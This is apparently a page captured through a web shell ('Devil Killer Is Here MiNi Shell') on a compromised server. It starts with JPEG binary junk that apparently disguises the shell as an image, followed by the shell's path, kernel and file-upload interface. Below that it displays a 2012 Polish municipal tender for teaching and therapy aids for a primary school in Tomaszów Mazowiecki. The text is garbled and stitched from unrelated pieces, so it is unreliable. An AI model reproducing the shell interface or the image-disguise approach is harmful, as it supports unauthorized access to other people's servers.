JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121003/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121003/379222-N-2012.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Realizacja projektu nr WND-POKL.09.01.02-10-008/12 pn. Zdobywcy świata w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 379222 - 2012; data zamieszczenia: 03.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Tomaszów Mazowiecki , ul. POW 10/16, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 724 23 11, faks 44 724 43 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-maz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja projektu nr WND-POKL.09.01.02-10-008/12 pn. Zdobywcy świata w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotowe zamówienie polega na dostawie pomocy dydaktycznych, tablicy interaktywnej, artykułów biurowych zużywalnych oraz naklejek samoprzylepnych z logo związanych z realizacją projektu pn.: Zdobywcy świata współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Projekt systemowy w zakresie indywidualizacji procesu nauczania i wychowania uczniów klas I-III w ramach dodatkowych zajęć edukacyjno-wychowawczych realizowany jest w Szkole Podstawowej nr 8, ul. Stolarska 21/27 w Tomaszowie Mazowieckim.  Organem prowadzącym dla Szkoły Podstawowej nr 8 jest Gmina Miasto Tomaszów Mazowiecki. 
2.	Przedmiot zamówienia został podzielony na 3 części, w ramach których zostaną kupione następujące artykuły:
	Część 1 zamówienia - Pomocy dydaktyczne.
	Część 2 zamówienia - Materiały biurowe zużywalne, naklejki samoprzylepne z logo.
	Część 3 zamówienia - Tablica interaktywna.
3.	Szczegółowy opis przedmiotu zamówienia został zawarty w części III SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.19.76.44-2, 32.32.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany Formularz Oferty.
2.		Oświadczenie wykonawcy, że zaoferowane produkty spełniają wszelkie wymagania określone przepisami prawa, odpowiadają określonym standardom lub specyfikacjom technicznym - załącznik nr 4 do CZĘŚCI II SIWZ.
3.	Pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Stosownie do treści art. 144 Pzp zamawiający przewiduje możliwość zmiany postanowień w zawartej umowie w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następujących przypadkach:
1)	zmian wynikających z  nowelizacji powszechnie obowiązujących przepisów,
2)	zmian korzystnych z punktu widzenia realizacji przedmiotu umowy,                        w szczególności przyspieszających realizację, obniżających koszty ponoszone przez zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-maz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Inwestycji Urzędu Miasta w Tomaszowie Mazowieckim, ul. Mościckiego 6, pok. 6, II piętro, 97-200 Tomaszów Maz., budynek kina Włókniarz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2012 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie zamawiającego w Tomaszowie Maz. ul. POW 10/16 pok. 12 budynek A (kancelaria ogólna), 97-200 Tomaszów Maz..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Realizacja projektu nr WND-POKL.09.01.02-10-008/12 pn. Zdobywcy świata w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
2. W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje zamawiający i wykonawcy przekazują pisemnie, faksem lub drogą elektroniczną.
3. Każda ze stron na żądanie drugiej strony zobowiązana jest niezwłocznie potwierdzić fakt ich otrzymania. W przypadku zastosowania faksu lub formy elektronicznej niezbędne jest ich potwierdzenie na piśmie. W przypadku braku potwierdzenia otrzymania wiadomości przez wykonawcę, uznaje się, iż pismo wysłane na nr faksu lub adres e-mail wskazany przez wykonawcę w ofercie zostało mu doręczone w sposób umożliwiający zapoznanie się z jego treścią.
4. Zamawiający, mając na względzie art. 9 ust. 1 oraz art. 27 ust. 1 Pzp, zastrzega, że w przypadku wezwania wykonawców do uzupełnienia dokumentów, oświadczeń lub pełnomocnictw na podstawie art. 26 ust. 3 Pzp, muszą one być przekazane w formie oryginału lub kopii potwierdzonej za zgodność (forma pisemna). Przekazanie ich w innej formie (np. faks, e-mail) nie będzie uznane jako skuteczne, jeżeli nie zostało przekazane w formie pisemnej w wyznaczonym terminie.
5. Osobami upoważnionymi do kontaktów z wykonawcami, w godzinach pracy Urzędu, pon. - piątek w godz. 7.30 - 15.30 są: 
     - w zakresie przedmiotu zamówienia:
       Halina Szczucińska, Małgorzata Adaszkiewicz - 48 (044) 724-23-11 wew. 277, 279.
     - w sprawach dotyczących procedury zamówień publicznych: 
       Adam Koziełek, Andrzej Pawlik  tel. 48 (044) 724-23-11 wew. 225, 267. 
       adres: e-mail - zam.pub@tomaszow-maz.pl, fax 48 (044) 724-43-59.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pomoce dydaktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup pomocy dydaktycznych na zajęcia dodatkowe dla uczniów Szkoły Podstawowej nr 8  w Tomaszowie Mazowieckim, dla której organem prowadzącym jest Gmina Miasto Tomaszów Mazowiecki w ramach projektu systemowego
 w zakresie indywidualizacji procesu nauczania i wychowania uczniów klas I-III pn. Zdobywcy świata współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
1) Wykaz pomocy dydaktycznych na zajęcia dla dzieci z trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:Trudności w czytaniu, zagrożenie dysleksją.Pakiet produktów zawiera: Zewnętrzna karta dźwiękowa 
eduSensus Dysleksja część I 
eduSensus Dysleksja część II 
eduROM Czytam i Piszę - Ilość 1; Eduterapeutica Dysleksja - komputerowy program terapeutyczny do pracy z dziećmi wykazującymi specyficzne trudności w czytaniu i pisaniu. Program zawiera 330 ćwiczeń i 137 kart pracy do wydruku-ilość 1; Przygotowanie do nauki pisania - przewodnik i 80 kart z rysunkami przygotowujących do nauki pisania-ilość 1; Uczę się pisać - zeszyt ćwiczeń dla dzieci przygotowujących się do nauki pisania-ilość 1; Małymi kroczkami. Ćwiczenia do zajęć wyrównawczych dla klas  I-II. Ćwiczenia dla dzieci z trudnościami edukacyjnymi-ilość 1; Zestaw talii. Rozwijamy mowę i myślenie. Zestaw 1 Gra typu Memory i Piotruś z zestawem innych zabaw i ćwiczeń dla dzieci rozwijających myślenie i język dziecka-ilość 1; Zestaw talii. Rozwijamy mowę i myślenie. Zestaw 2 Gra typu Memory i Piotruś z zestawem innych zabaw i ćwiczeń dla dzieci rozwijających myślenie i język dziecka-ilość 1; Zestaw talii. Rozwijamy mowę i myślenie. Zestaw 3 Gra typu Memory i Piotruś z zestawem innych zabaw i ćwiczeń dla dzieci rozwijających myślenie i język dziecka-ilość 1; Puzzle edukacyjne Puzzle kwiatki ó, u, rz, ż, ch, h. Ćwiczenia dla dzieci, kształcących umiejętność poprawnego pisania wyrazów z niewymiennymi ó, u, rz, ż, ch, h-ilość 1; Czynności i odmiana czasowników - układanka edukacyjna-Ilość 1; Stopniowanie przymiotników - układanka edukacyjna-ilość 1; Sylaby w dominie - gra dydaktyczna-ilość 1; Quiz ortograficzny - gra umożliwia wzrokowe zapamiętywanie poszczególnych wyrazów, co jest kluczem do opanowania ortografii-ilość 1;
Moje sylabki zestaw 1 - Seria 5 zeszytów; pomoc w pracy z dziećmi z zaburzeniami komunikacji językowej i dyslektycznymi. Teczka A4 + 37 kart + 17-stronicowa broszura z opisem metody i poleceniami do ćwiczeń-ilość 1; Moje sylabki zestaw 2 - Seria 5 zeszytów; pomoc w pracy z dziećmi z zaburzeniami komunikacji językowej i dyslektycznymi, format: Teczka A4 + 37 kart + 17-stronicowa broszura z opisem metody i poleceniami do ćwiczeń-ilość 1; Moje sylabki zestaw 3 - Seria 5 zeszytów; pomoc w pracy z dziećmi z zaburzeniami komunikacji językowej i dyslektycznymi, format: Teczka A4 + 58 kart + broszura z opisem metody i poleceniami do ćwiczeń-Ilość 1; Moje sylabki zestaw 4 - Seria 5 zeszytów; pomoc w pracy z dziećmi z zaburzeniami komunikacji językowej i dyslektycznymi. Teczka A4 + 52 karty + broszura z opisem metody i poleceniami do ćwiczeń-ilość 1; Moje sylabki zestaw 5 - Seria 5 zeszytów; pomoc w pracy z dziećmi z zaburzeniami komunikacji językowej i dyslektycznymi. Teczka A4 +  50 kart + broszura z opisem metody i poleceniami do ćwiczeń-ilość 1;
2) Wykaz pomocy dydaktycznych na zajęcia gimnastyki korekcyjnej dla dzieci z wadami postawy: Mata MiniJeżyk - do korekcji wad postawy i akupresury stóp, wymiary: dł. 33 cm, szer. Od 20 do 34 cm	-Ilość 5; Mata rehabilitacyjna z kieszeniami - do korekcji stóp, wymiary: dł. 120 cm, szer. 60 cm-Ilość 2; Piłeczka Pajączek 11 cm - do gimnastyki palców i stymuluje percepcje dotykowe-Ilość 5; Półkule sensoryczne - półkule służące do ćwiczenia równowagi i koordynacji, wymiary: śr. 16 cm, wys. 8cm-Ilość 4; Wyspy - do tworzenia torów i ścieżek, wymiary: śr. 43 cm, wys. 7 cm-Ilość 2; Rzeka - do ćwiczeń na równowagę i tworzenia torów, wymiary: 35,5x11,5x4,5 cm	-Ilość 2; Wałek sensoryczny - wałek do pobudzania zmysłu dotyku, wymiary: dł. 90 cm, śr. 55 cm	-ilość 10; Piłki z kolcami 65cm - Piłka do terapii i rehabilitacji. Miękka guma z wypustkami na powierzchni. Zapewnia stymulację dotykową-ilość 5; Piłeczki do masażu o śr. od 8 cm do 10 cm - piłki do terapii i rehabilitacji. Miękka guma z wypustkami na powierzchni. Zapewnia stymulację dotykową-ilość 3; Dotykowe krążki o śr. od 11 cm do 27 cm - krążki do terapii i rehabilitacji, wykonane z kauczuku o różnych fakturach-ilość 1; Worki do skakania - wykorzystywane do utrzymywania równowagi i ćwiczeń mięśni całego ciała, 6 sztuk, wymiary: 52x62 cm-ilość 2; Ringo - krążki z miękkiego tworzywa sztucznego, nauka chwytania, śr. 18 cm-ilość 9; Zestaw gimnastyczny - 6 obręczy o śr. 50 cm, zaciski 3 x 8 sztuk, 6 podstawstojaków,10 drążków gimnastycznych o dł. 70 cm-ilość 1; Ślady stóp - seria kolorowych, gumowych elementów, wykonana z elastycznego ale trwałego tworzywa, 6 par, wymiary: 22,5 cm-ilość 4; Ślady dłoni -  seria kolorowych, gumowych elementów, wykonana z elastycznego trwałego tworzywa, 6 par, wymiary: 22,5 cm-ilość 4; Plansza na walcu - pozwala na ćwiczenia równowagi w kierunku prawo - lewo, wymiary: 70 x 20 x 9 cm-ilość 1; Plansza bujak - ćwiczy koordynację ruchową, wymiary: 52x12,5x9 cm-ilość 2; Miniszczudła - wyrabiają równowagę, wymiary: wys. 12,5 cm, śr. 13,5 cm-ilość 5; Woreczki sportowe - woreczki wykonane z mocne tkaniny, w zestawie 4 sztuki, wymiary: 10x13 cm-ilość 6; Tunel Zygzak - tor przeszkód, wymiary: śr. 45 cm, dł. 280 cm-ilość 2; Piłki skaczące HOP 45cm - Wytrzymuje 150 kg nacisku przy skakaniu, zabawa z piłką ćwiczy mięśnie całego ciała, chwytność i ogólną kondycję fizyczną. Posiada stabilny uchwyt do trzymania-ilość 5; Piłki skaczące HOP 55cm - Wytrzymuje 150 kg nacisku przy skakaniu, zabawa z piłką ćwiczy mięśnie całego ciała, chwytność i ogólną kondycję fizyczną. Posiada stabilny uchwyt do trzymania-ilość 5; Karty do ćwiczeń gimnastyka ciała 1 -  zestaw 16 kart z instrukcją-ilość 1; Drabinka półokrągła - ma zastosowanie w rehabilitacji z zaburzeniami równowagi, poczucia ciała w przestrzeni oraz koordynacją ruchową, wymiary: 98 x 44 x 50 cm-ilość 1; Płotki - wymiary najniższego : szer. 66 cm, wys. 19 cm, wymiary najwyższego: szer. 66 cm, wys. 35 cm-ilość 2;
3) Wykaz pomocy dydaktycznych na zajęcia socjoterapeutyczne 
i psychoedukacyjne dla dzieci z zaburzenia komunikacji społecznej;  Historyjka obrazkowa Jak to naprawić. Zachęcają do dyskusji, analizowania sytuacji trudnych i wspólnego szukania rozwiązań. - 71 kart w formacie 9x9cm-ilość 1;
Historyjka obrazkowa Co teraz? Problemy. Historyjki sytuacyjne prezentujące zdarzenia w szkole lub poza nią. 75 kart (wym. 9x9cm)-ilość 1;
Zdjęcia - Emocje i uczucia. Zdjęcia przedstawiają twarze dzieci, u których poprzez mimikę twarzy wyrażane są różne emocje. Zadanie może polegać na rozpoznawaniu i nazywaniu uczuć,  24 zdjęcia o wym. 21 x 15 cm-ilość 2;
Zdjęcia - Rodzina. Seria zdjęć ukazujących różne typy rodzin spędzających czas w różnych miejscach. Ćwiczenia z kartami mogą stać się okazją do rozmów o rodzinie, o emocjach, o zainteresowaniach różnych ludzi. - 24 zdjęcia o wym. 21 x 15 cm-ilość 2;
Lalka Samanta - Zachęcają do twórczej ekspresji językowej oraz ruchowej. Elementy można mocować do dłoni lalki za pomocą rzepów. - wym. 70 cm - alfabet-ilość 1;
Lalka Jaś -  Zabawa z lalką rozwija inteligencję językową poprzez kształtowanie umiejętności budowania pięknych wypowiedzi, snucia interesujących opowieści, prowadzenia dyskusji czy przeprowadzania wywiadów. Elementy można mocować do dłoni lalki za pomocą rzepów. - wym. 70 cm - cyfry od 0 do 10-ilość 1;
Gra Tastomino. Zupełnie nowe domino wzrokowo-dotykowe. - 27 kostek domino (5 x 5 cm), 5 bawełnianych woreczków-ilość 2;
Gra z cukierkami XXL Gra, której celem jest zebranie jak największej ilości cukierków w wyznaczonym czasie. Każdy kolejny gracz szuka cukierka w kolorach wyznaczonych poprzez rzut trzema kostkami. Gra rozwija spostrzegawczość i ćwiczy refleks, plansza z tkaniny, 3 kostki z kolorami, 41 kolorowych drewnianych cukierków o
 wym. 13 cm, od 4 lat-ilość 2;
Kalambury. Dwie drużyny podążają do mety, odgadując po drodze pokazane bądź narysowane hasła. - plansza, 100 kart z poleceniami, 4 pionki, bloczek do rysowania, instrukcja gry-ilość 2;
Odkrycia - poznać i zrozumieć siebie.  Karty ułatwiają otwarcie się w rozmowie a następnie dzielenie się osobistymi przeżyciami oraz nauczą nas rozwijania swoich wypowiedzi. - kolorowa plansza do gry, 30 kart ilustrowanych, 4 karty do zadawania pytań, 2 karty do indywidualnej historii, 4 drewniane pionki - kolorowe zwierzątka, drewniana kostka do gry, książeczka z instrukcją gry-ilość 2;
Balansująca gra grupowa. Ćwiczenie polega na przekazywaniu piłki kolejnej parze tak by piłka nie spadła na ziemię. Zabawa wymaga skupienia i precyzji ruchów. - 6 szt., piłka-ilość 1;
Einstein. Nowe, niezwykle ciekawe zestawy kart będące gotowymi propozycjami przeprowadzenia atrakcyjnych zajęć ruchowych, również gimnastyki śródlekcyjnej.Karty laminowane. - 16 kart, wym. karty: 22 x 28 cm, od 4 lat-ilość 1
Aktywność zwierząt. Każda karta zawiera fotografię dziecka wykonującego ćwiczenie, a na odwrocie obrazkową czytelną instrukcję wykonania ćwiczenia. Format kart odpowiednio duży, aby ułatwić demonstrację całej grupie. Stopień trudności oznaczony kolorem. Każdy zestaw zawiera rozbudowaną instrukcję metodyczną dla nauczyciela. Karty laminowane. - 16 kart, wym. karty: 22 x 28 cm, od 4 lat-ilość 1;
Śmiech to zdrowie. Nowe, niezwykle ciekawe zestawy kart będące gotowymi propozycjami przeprowadzenia atrakcyjnych zajęć ruchowych, również gimnastyki śródlekcyjnej. Karty laminowane. - 16 kart, wym. karty: 22 x 28 cm, od 4 lat-ilość 1
